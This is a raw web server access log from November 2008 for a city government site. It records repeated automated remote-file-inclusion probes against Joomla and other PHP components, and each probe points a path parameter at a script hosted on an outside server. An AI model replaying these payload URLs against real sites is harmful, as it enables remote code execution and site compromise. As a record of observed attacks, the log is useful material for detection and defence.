81.29.67.201 - - [30/Nov/2008:22:16:20 -0800] "GET /logs//?path%5Bdocroot%5D=http://danceschoolgloucestershire.co.uk//assets/snippets/reflect/gif/newid.txt? HTTP/1.1" 200 4089 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
81.29.67.201 - - [30/Nov/2008:22:16:23 -0800] "GET /logs/access_071201.log//?path%5Bdocroot%5D=http://danceschoolgloucestershire.co.uk//assets/snippets/reflect/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
81.29.67.201 - - [30/Nov/2008:22:17:37 -0800] "GET /logs/access_071201.log//?path%5Bdocroot%5D=http://danceschoolgloucestershire.co.uk//assets/snippets/reflect/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
81.29.67.201 - - [30/Nov/2008:22:17:48 -0800] "GET /logs/access_071201.log//?path%5Bdocroot%5D=http://danceschoolgloucestershire.co.uk//assets/snippets/reflect/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
66.160.185.20 - - [30/Nov/2008:22:17:57 -0800] "GET /logs/access_080731.log//components/com_flyspray/startdown.php?file=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
66.160.185.20 - - [30/Nov/2008:22:17:57 -0800] "GET /components/com_flyspray/startdown.php?file=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
66.160.185.20 - - [30/Nov/2008:22:17:57 -0800] "GET /logs//components/com_flyspray/startdown.php?file=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
66.160.185.20 - - [30/Nov/2008:22:20:35 -0800] "GET /logs/access_081031.log//components/com_flyspray/startdown.php?file=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
222.233.52.18 - - [30/Nov/2008:22:23:47 -0800] "GET /logs/access_080201.log//?path%5Bdocroot%5D=http://www.ss-safety.co.kr/kboard/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
222.233.52.18 - - [30/Nov/2008:22:23:47 -0800] "GET /?path%5Bdocroot%5D=http://www.ss-safety.co.kr/kboard/perkosa.txt??? HTTP/1.1" 200 917 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
222.233.52.18 - - [30/Nov/2008:22:23:47 -0800] "GET /logs//?path%5Bdocroot%5D=http://www.ss-safety.co.kr/kboard/perkosa.txt??? HTTP/1.1" 200 4089 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
222.233.52.18 - - [30/Nov/2008:22:25:21 -0800] "GET /logs/access_080329.log//?path%5Bdocroot%5D=http://www.ss-safety.co.kr/kboard/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
131.95.109.21 - - [30/Nov/2008:22:26:49 -0800] "GET /logs/access_080201.log//?path%5Bdocroot%5D=http://danceschoolgloucestershire.co.uk//assets/snippets/reflect/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
131.95.109.21 - - [30/Nov/2008:22:26:49 -0800] "GET /logs/access_080201.log//?path%5Bdocroot%5D=http://danceschoolgloucestershire.co.uk//assets/snippets/reflect/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
131.95.109.21 - - [30/Nov/2008:22:26:49 -0800] "GET /logs/access_080201.log//?path%5Bdocroot%5D=http://danceschoolgloucestershire.co.uk//assets/snippets/reflect/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
131.95.109.21 - - [30/Nov/2008:22:26:49 -0800] "GET /logs/access_080201.log//?path%5Bdocroot%5D=http://danceschoolgloucestershire.co.uk//assets/snippets/reflect/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
131.95.109.21 - - [30/Nov/2008:22:26:49 -0800] "GET /?path%5Bdocroot%5D=http://danceschoolgloucestershire.co.uk//assets/snippets/reflect/gif/newid.txt? HTTP/1.1" 200 917 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
131.95.109.21 - - [30/Nov/2008:22:26:49 -0800] "GET /?path%5Bdocroot%5D=http://danceschoolgloucestershire.co.uk//assets/snippets/reflect/gif/newid.txt? HTTP/1.1" 200 917 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
131.95.109.21 - - [30/Nov/2008:22:26:49 -0800] "GET /?path%5Bdocroot%5D=http://danceschoolgloucestershire.co.uk//assets/snippets/reflect/gif/newid.txt? HTTP/1.1" 200 917 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
131.95.109.21 - - [30/Nov/2008:22:26:49 -0800] "GET /?path%5Bdocroot%5D=http://danceschoolgloucestershire.co.uk//assets/snippets/reflect/gif/newid.txt? HTTP/1.1" 200 917 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
131.95.109.21 - - [30/Nov/2008:22:26:49 -0800] "GET /logs//?path%5Bdocroot%5D=http://danceschoolgloucestershire.co.uk//assets/snippets/reflect/gif/newid.txt? HTTP/1.1" 200 4089 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
131.95.109.21 - - [30/Nov/2008:22:26:49 -0800] "GET /logs//?path%5Bdocroot%5D=http://danceschoolgloucestershire.co.uk//assets/snippets/reflect/gif/newid.txt? HTTP/1.1" 200 4089 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
131.95.109.21 - - [30/Nov/2008:22:26:49 -0800] "GET /logs//?path%5Bdocroot%5D=http://danceschoolgloucestershire.co.uk//assets/snippets/reflect/gif/newid.txt? HTTP/1.1" 200 4089 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
131.95.109.21 - - [30/Nov/2008:22:26:49 -0800] "GET /logs//?path%5Bdocroot%5D=http://danceschoolgloucestershire.co.uk//assets/snippets/reflect/gif/newid.txt? HTTP/1.1" 200 4089 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
200.49.155.60 - - [30/Nov/2008:22:28:03 -0800] "GET /logs/access_080201.log//?path%5Bdocroot%5D=http://danceschoolgloucestershire.co.uk//assets/snippets/reflect/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
200.49.155.60 - - [30/Nov/2008:22:28:04 -0800] "GET /?path%5Bdocroot%5D=http://danceschoolgloucestershire.co.uk//assets/snippets/reflect/gif/newid.txt? HTTP/1.1" 200 917 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
200.49.155.60 - - [30/Nov/2008:22:28:04 -0800] "GET /logs//?path%5Bdocroot%5D=http://danceschoolgloucestershire.co.uk//assets/snippets/reflect/gif/newid.txt? HTTP/1.1" 200 4089 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
66.40.52.25 - - [30/Nov/2008:22:31:54 -0800] "GET /zipndownload.php?PP_PATH=http://www.geocities.com/rafaelrado/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "cityofarkadelphia.com"
66.40.52.25 - - [30/Nov/2008:22:31:54 -0800] "GET /logs/access_080330.log//zipndownload.php?PP_PATH=http://www.geocities.com/rafaelrado/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "cityofarkadelphia.com"
66.40.52.25 - - [30/Nov/2008:22:31:54 -0800] "GET /logs//zipndownload.php?PP_PATH=http://www.geocities.com/rafaelrado/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "cityofarkadelphia.com"
66.40.52.25 - - [30/Nov/2008:22:31:55 -0800] "GET /zipndownload.php?PP_PATH=http://www.geocities.com/rafaelrado/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "cityofarkadelphia.com"
66.40.52.25 - - [30/Nov/2008:22:31:55 -0800] "GET /logs//zipndownload.php?PP_PATH=http://www.geocities.com/rafaelrado/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "cityofarkadelphia.com"
66.40.52.25 - - [30/Nov/2008:22:31:55 -0800] "GET /logs/access_080330.log//zipndownload.php?PP_PATH=http://www.geocities.com/rafaelrado/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "cityofarkadelphia.com"
131.95.109.21 - - [30/Nov/2008:22:32:24 -0800] "GET /logs/access_080330.log//?path%5Bdocroot%5D=http://danceschoolgloucestershire.co.uk//assets/snippets/reflect/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
131.95.109.21 - - [30/Nov/2008:22:32:32 -0800] "GET /logs/access_080330.log//?path%5Bdocroot%5D=http://danceschoolgloucestershire.co.uk//assets/snippets/reflect/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
131.95.109.21 - - [30/Nov/2008:22:32:32 -0800] "GET /logs/access_080330.log//?path%5Bdocroot%5D=http://danceschoolgloucestershire.co.uk//assets/snippets/reflect/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
131.95.109.21 - - [30/Nov/2008:22:32:35 -0800] "GET /logs/access_080330.log//?path%5Bdocroot%5D=http://danceschoolgloucestershire.co.uk//assets/snippets/reflect/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
66.40.52.25 - - [30/Nov/2008:22:32:39 -0800] "GET /logs/access_071231.log//zipndownload.php?PP_PATH=http://www.geocities.com/rafaelrado/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "cityofarkadelphia.com"
66.40.52.25 - - [30/Nov/2008:22:32:43 -0800] "GET /logs/access_071231.log//zipndownload.php?PP_PATH=http://www.geocities.com/rafaelrado/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "cityofarkadelphia.com"
200.49.155.60 - - [30/Nov/2008:22:35:45 -0800] "GET /logs/access_080330.log//?path%5Bdocroot%5D=http://danceschoolgloucestershire.co.uk//assets/snippets/reflect/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
222.233.52.18 - - [30/Nov/2008:22:37:06 -0800] "GET /logs/access_080101.log//?path%5Bdocroot%5D=http://www.ss-safety.co.kr/kboard/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
66.160.185.20 - - [30/Nov/2008:22:38:58 -0800] "GET /logs/access_080901.log//components/com_flyspray/startdown.php?file=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
64.22.110.198 - - [30/Nov/2008:22:47:27 -0800] "GET /logs/access_080201.log/errors.php?error=http://www.ovarnews.com/mambots/user/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
64.22.110.198 - - [30/Nov/2008:22:47:28 -0800] "GET /errors.php?error=http://www.ovarnews.com/mambots/user/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
64.22.110.198 - - [30/Nov/2008:22:47:28 -0800] "GET /logs/errors.php?error=http://www.ovarnews.com/mambots/user/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
64.22.110.198 - - [30/Nov/2008:22:48:41 -0800] "GET /logs/access_080731.log/errors.php?error=http://www.ovarnews.com/mambots/user/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
64.22.110.198 - - [30/Nov/2008:22:51:21 -0800] "GET /logs/access_080201.log%20/errors.php?error=http://www.ovarnews.com/mambots/user/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
81.29.67.201 - - [30/Nov/2008:22:52:45 -0800] "GET /logs/access_081031.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://danceschoolgloucestershire.co.uk//assets/snippets/reflect/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
81.29.67.201 - - [30/Nov/2008:22:52:45 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://danceschoolgloucestershire.co.uk//assets/snippets/reflect/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
81.29.67.201 - - [30/Nov/2008:22:52:45 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://danceschoolgloucestershire.co.uk//assets/snippets/reflect/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
81.29.67.201 - - [30/Nov/2008:22:53:31 -0800] "GET /logs/access_081031.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://danceschoolgloucestershire.co.uk//assets/snippets/reflect/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
81.29.67.201 - - [30/Nov/2008:22:53:31 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://danceschoolgloucestershire.co.uk//assets/snippets/reflect/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
81.29.67.201 - - [30/Nov/2008:22:53:31 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://danceschoolgloucestershire.co.uk//assets/snippets/reflect/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
81.29.67.201 - - [30/Nov/2008:22:54:45 -0800] "GET /logs/access_081031.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://danceschoolgloucestershire.co.uk//assets/snippets/reflect/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
81.29.67.201 - - [30/Nov/2008:22:54:45 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://danceschoolgloucestershire.co.uk//assets/snippets/reflect/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
81.29.67.201 - - [30/Nov/2008:22:54:45 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://danceschoolgloucestershire.co.uk//assets/snippets/reflect/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
66.40.52.25 - - [30/Nov/2008:23:18:30 -0800] "GET /logs/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.geocities.com/rafaelrado/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "cityofarkadelphia.com"
66.40.52.25 - - [30/Nov/2008:23:18:30 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.geocities.com/rafaelrado/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "cityofarkadelphia.com"
66.40.52.25 - - [30/Nov/2008:23:18:30 -0800] "GET /logs/access_081031.log/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.geocities.com/rafaelrado/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "cityofarkadelphia.com"
66.40.52.25 - - [30/Nov/2008:23:19:05 -0800] "GET /logs/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.geocities.com/rafaelrado/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "cityofarkadelphia.com"
66.40.52.25 - - [30/Nov/2008:23:19:05 -0800] "GET /logs/access_081031.log/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.geocities.com/rafaelrado/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "cityofarkadelphia.com"
66.40.52.25 - - [30/Nov/2008:23:19:06 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.geocities.com/rafaelrado/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "cityofarkadelphia.com"
203.228.242.67 - - [30/Nov/2008:23:20:27 -0800] "GET /?path%5Bdocroot%5D=http://wildfood.co.kr/home//data/pandega.txt? HTTP/1.1" 200 917 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
203.228.242.67 - - [30/Nov/2008:23:20:44 -0800] "GET /?path%5Bdocroot%5D=http://wildfood.co.kr/home//data/pandega.txt? HTTP/1.1" 200 917 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
66.40.52.25 - - [30/Nov/2008:23:22:40 -0800] "GET /logs/access.log/?_zb_path=http://www.geocities.com/rafaelrado/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "cityofarkadelphia.com"
66.40.52.25 - - [30/Nov/2008:23:22:40 -0800] "GET /?_zb_path=http://www.geocities.com/rafaelrado/id.txt??? HTTP/1.1" 200 917 "-" "libwww-perl/5.800" "cityofarkadelphia.com"
66.40.52.25 - - [30/Nov/2008:23:22:40 -0800] "GET /logs/?_zb_path=http://www.geocities.com/rafaelrado/id.txt??? HTTP/1.1" 200 4084 "-" "libwww-perl/5.800" "cityofarkadelphia.com"
66.40.52.25 - - [30/Nov/2008:23:23:40 -0800] "GET //?custompluginfile%5B%5D=http://www.geocities.com/rafaelrado/id.txt??? HTTP/1.1" 200 917 "-" "libwww-perl/5.800" "cityofarkadelphia.com"
66.40.52.25 - - [30/Nov/2008:23:23:40 -0800] "GET /logs/access_081031.log///?custompluginfile%5B%5D=http://www.geocities.com/rafaelrado/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "cityofarkadelphia.com"
66.40.52.25 - - [30/Nov/2008:23:23:40 -0800] "GET /logs///?custompluginfile%5B%5D=http://www.geocities.com/rafaelrado/id.txt??? HTTP/1.1" 200 4090 "-" "libwww-perl/5.800" "cityofarkadelphia.com"
66.40.52.25 - - [30/Nov/2008:23:24:27 -0800] "GET /logs/access_081031.log///?custompluginfile%5B%5D=http://www.geocities.com/rafaelrado/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "cityofarkadelphia.com"
66.40.52.25 - - [30/Nov/2008:23:24:27 -0800] "GET //?custompluginfile%5B%5D=http://www.geocities.com/rafaelrado/id.txt??? HTTP/1.1" 200 917 "-" "libwww-perl/5.800" "cityofarkadelphia.com"
66.40.52.25 - - [30/Nov/2008:23:24:27 -0800] "GET /logs///?custompluginfile%5B%5D=http://www.geocities.com/rafaelrado/id.txt??? HTTP/1.1" 200 4090 "-" "libwww-perl/5.800" "cityofarkadelphia.com"
66.40.52.25 - - [30/Nov/2008:23:24:38 -0800] "GET /logs/access.log//?_zb_path=http://www.geocities.com/rafaelrado/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "cityofarkadelphia.com"
66.40.52.25 - - [30/Nov/2008:23:24:38 -0800] "GET /?_zb_path=http://www.geocities.com/rafaelrado/id.txt??? HTTP/1.1" 200 917 "-" "libwww-perl/5.800" "cityofarkadelphia.com"
66.40.52.25 - - [30/Nov/2008:23:24:38 -0800] "GET /logs//?_zb_path=http://www.geocities.com/rafaelrado/id.txt??? HTTP/1.1" 200 4089 "-" "libwww-perl/5.800" "cityofarkadelphia.com"
66.40.52.25 - - [30/Nov/2008:23:24:43 -0800] "GET /logs/access.log/?_zb_path=http://www.geocities.com/rafaelrado/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "cityofarkadelphia.com"
66.40.52.25 - - [30/Nov/2008:23:24:43 -0800] "GET /?_zb_path=http://www.geocities.com/rafaelrado/id.txt??? HTTP/1.1" 200 917 "-" "libwww-perl/5.800" "cityofarkadelphia.com"
66.40.52.25 - - [30/Nov/2008:23:24:43 -0800] "GET /logs/?_zb_path=http://www.geocities.com/rafaelrado/id.txt??? HTTP/1.1" 200 4084 "-" "libwww-perl/5.800" "cityofarkadelphia.com"
66.40.52.25 - - [30/Nov/2008:23:25:23 -0800] "GET /logs/access.log//?_zb_path=http://www.geocities.com/rafaelrado/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "cityofarkadelphia.com"
66.40.52.25 - - [30/Nov/2008:23:25:23 -0800] "GET /?_zb_path=http://www.geocities.com/rafaelrado/id.txt??? HTTP/1.1" 200 917 "-" "libwww-perl/5.800" "cityofarkadelphia.com"
66.40.52.25 - - [30/Nov/2008:23:25:23 -0800] "GET /logs//?_zb_path=http://www.geocities.com/rafaelrado/id.txt??? HTTP/1.1" 200 4089 "-" "libwww-perl/5.800" "cityofarkadelphia.com"
69.64.49.177 - - [30/Nov/2008:23:27:06 -0800] "GET /skin/zero_vote/error.php?dir=http://www.ccdomcol.com/crisannissa///.../.thumb/del.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
69.64.49.177 - - [30/Nov/2008:23:28:18 -0800] "GET /logs/access_071201.log//skin/zero_vote/error.php?dir=http://www.ccdomcol.com/crisannissa///.../.thumb/del.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
69.64.49.177 - - [30/Nov/2008:23:28:18 -0800] "GET /skin/zero_vote/error.php?dir=http://www.ccdomcol.com/crisannissa///.../.thumb/del.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
69.64.49.177 - - [30/Nov/2008:23:28:18 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.ccdomcol.com/crisannissa///.../.thumb/del.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
69.64.49.177 - - [30/Nov/2008:23:28:19 -0800] "GET /logs/access_080201.log//skin/zero_vote/error.php?dir=http://www.ccdomcol.com/crisannissa///.../.thumb/del.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
89.218.85.18 - - [30/Nov/2008:23:32:32 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://%20www.geocities.com/rafaelrado/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
89.218.85.18 - - [30/Nov/2008:23:32:32 -0800] "GET /logs/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://%20www.geocities.com/rafaelrado/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
89.218.85.18 - - [30/Nov/2008:23:32:32 -0800] "GET /logs/access_081031.log/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://%20www.geocities.com/rafaelrado/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
92.46.175.14 - - [30/Nov/2008:23:34:25 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.geocities.com/rafaelrado/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "cityofarkadelphia.com"
92.46.175.14 - - [30/Nov/2008:23:34:25 -0800] "GET /logs/access_081031.log/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.geocities.com/rafaelrado/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "cityofarkadelphia.com"
92.46.175.14 - - [30/Nov/2008:23:34:30 -0800] "GET /logs/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.geocities.com/rafaelrado/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "cityofarkadelphia.com"
203.228.242.67 - - [30/Nov/2008:23:37:06 -0800] "GET /logs/access_080201.log//?path%5Bdocroot%5D=http://wildfood.co.kr/home//data/pandega.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
203.228.242.67 - - [30/Nov/2008:23:37:12 -0800] "GET /?path%5Bdocroot%5D=http://wildfood.co.kr/home//data/pandega.txt? HTTP/1.1" 200 917 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
203.228.242.67 - - [30/Nov/2008:23:37:19 -0800] "GET /logs//?path%5Bdocroot%5D=http://wildfood.co.kr/home//data/pandega.txt? HTTP/1.1" 200 4089 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
203.228.242.67 - - [30/Nov/2008:23:37:22 -0800] "GET /logs/access_080201.log//?path%5Bdocroot%5D=http://wildfood.co.kr/home//data/pandega.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
203.228.242.67 - - [30/Nov/2008:23:37:24 -0800] "GET /logs/access_080201.log//?path%5Bdocroot%5D=http://wildfood.co.kr/home//data/pandega.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
203.228.242.67 - - [30/Nov/2008:23:37:28 -0800] "GET /?path%5Bdocroot%5D=http://wildfood.co.kr/home//data/pandega.txt? HTTP/1.1" 200 917 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
203.228.242.67 - - [30/Nov/2008:23:37:29 -0800] "GET /?path%5Bdocroot%5D=http://wildfood.co.kr/home//data/pandega.txt? HTTP/1.1" 200 917 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
203.228.242.67 - - [30/Nov/2008:23:37:33 -0800] "GET /logs//?path%5Bdocroot%5D=http://wildfood.co.kr/home//data/pandega.txt? HTTP/1.1" 200 4089 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
203.228.242.67 - - [30/Nov/2008:23:37:35 -0800] "GET /logs//?path%5Bdocroot%5D=http://wildfood.co.kr/home//data/pandega.txt? HTTP/1.1" 200 4089 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
87.230.106.240 - - [30/Nov/2008:23:40:21 -0800] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://wildfood.co.kr/home//data/pandega.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
87.230.106.240 - - [30/Nov/2008:23:40:21 -0800] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://wildfood.co.kr/home//data/pandega.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
62.44.72.229 - - [30/Nov/2008:23:51:14 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://you-buy-viagra.com/files/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
62.44.72.229 - - [30/Nov/2008:23:51:14 -0800] "GET /skin/zero_vote/error.php?dir=http://you-buy-viagra.com/files/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
62.44.72.229 - - [30/Nov/2008:23:51:14 -0800] "GET /logs/access_080201.log//skin/zero_vote/error.php?dir=http://you-buy-viagra.com/files/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
62.44.72.229 - - [30/Nov/2008:23:51:33 -0800] "GET /logs/access_080329.log//skin/zero_vote/error.php?dir=http://you-buy-viagra.com/files/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
62.141.48.87 - - [30/Nov/2008:23:54:23 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.bodez.us/template/cmd? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
62.141.48.87 - - [30/Nov/2008:23:54:23 -0800] "GET /skin/zero_vote/error.php?dir=http://www.bodez.us/template/cmd? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
89.218.85.18 - - [30/Nov/2008:23:54:55 -0800] "GET /logs/access_080401.log//index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://%20www.geocities.com/rafaelrado/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
62.44.72.229 - - [30/Nov/2008:23:55:09 -0800] "GET /logs/access_080201.log%20%20//skin/zero_vote/error.php?dir=http://you-buy-viagra.com/files/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
62.44.72.229 - - [30/Nov/2008:23:55:09 -0800] "GET /logs/access_071201.log%20%20//skin/zero_vote/error.php?dir=http://you-buy-viagra.com/files/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
62.44.72.229 - - [30/Nov/2008:23:59:01 -0800] "GET /logs/access_071101.log//skin/zero_vote/error.php?dir=http://you-buy-viagra.com/files/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
62.44.72.229 - - [30/Nov/2008:23:59:05 -0800] "GET /logs/access_080101.log//skin/zero_vote/error.php?dir=http://you-buy-viagra.com/files/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
203.228.242.67 - - [30/Nov/2008:23:59:06 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://wildfood.co.kr/home//data/pandega.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
